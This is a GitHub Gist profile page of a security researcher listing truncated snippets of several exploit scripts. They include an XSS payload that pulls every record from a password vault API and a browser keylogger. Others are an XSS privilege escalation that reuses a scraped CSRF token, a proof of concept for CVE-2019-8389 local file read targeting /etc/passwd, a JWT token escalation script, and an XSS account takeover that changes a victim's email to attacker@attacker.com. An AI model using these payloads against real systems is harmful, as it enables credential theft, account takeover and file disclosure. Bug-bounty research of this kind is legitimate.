Skip to content

Instantly share code, notes, and snippets.

Avatar

Shawar Khan shawarkhanethicalhacker

View GitHub Profile
@shawarkhanethicalhacker
shawarkhanethicalhacker / password_vault_exploit.js
Created Aug 20, 2018
XSS Exploit code for retrieving passwords stored in a Password Vault
View password_vault_exploit.js
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON
View exptest.js
var keys = '';
document.onkeypress = function(e) {
var get = window.event ? event : e;
var key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key;----
}
window.setInterval(function(){
@shawarkhanethicalhacker
shawarkhanethicalhacker / XSS_Privilege_Escalation.js
Created Aug 4, 2019
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
View XSS_Privilege_Escalation.js
// XSS Exploit code for Privilege Escalation
// Author: Shawar Khan
var woot = document.createElement('html');
fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){
woot.innerHTML=data;
var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
privilege_escalate();
@shawarkhanethicalhacker
shawarkhanethicalhacker / Musicloud-exploit.py
Last active Feb 17, 2019
[CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application
View Musicloud-exploit.py
#!/usr/bin/python
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan
import sys
import requests
def usage():
print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"
@shawarkhanethicalhacker
shawarkhanethicalhacker / token.py
Last active Jan 28, 2019
A little automation for obtaining JWT token for a POC
View token.py
# A sample code that obtains a permanent JWT token when provided a temporary JWT token
import json
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
jwt_token=raw_input("Enter token > ")
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token"
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"}
@shawarkhanethicalhacker
shawarkhanethicalhacker / email_change_exploit_xss.js
Created Sep 14, 2018
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
View email_change_exploit_xss.js
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load',
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
You can’t perform that action at this time.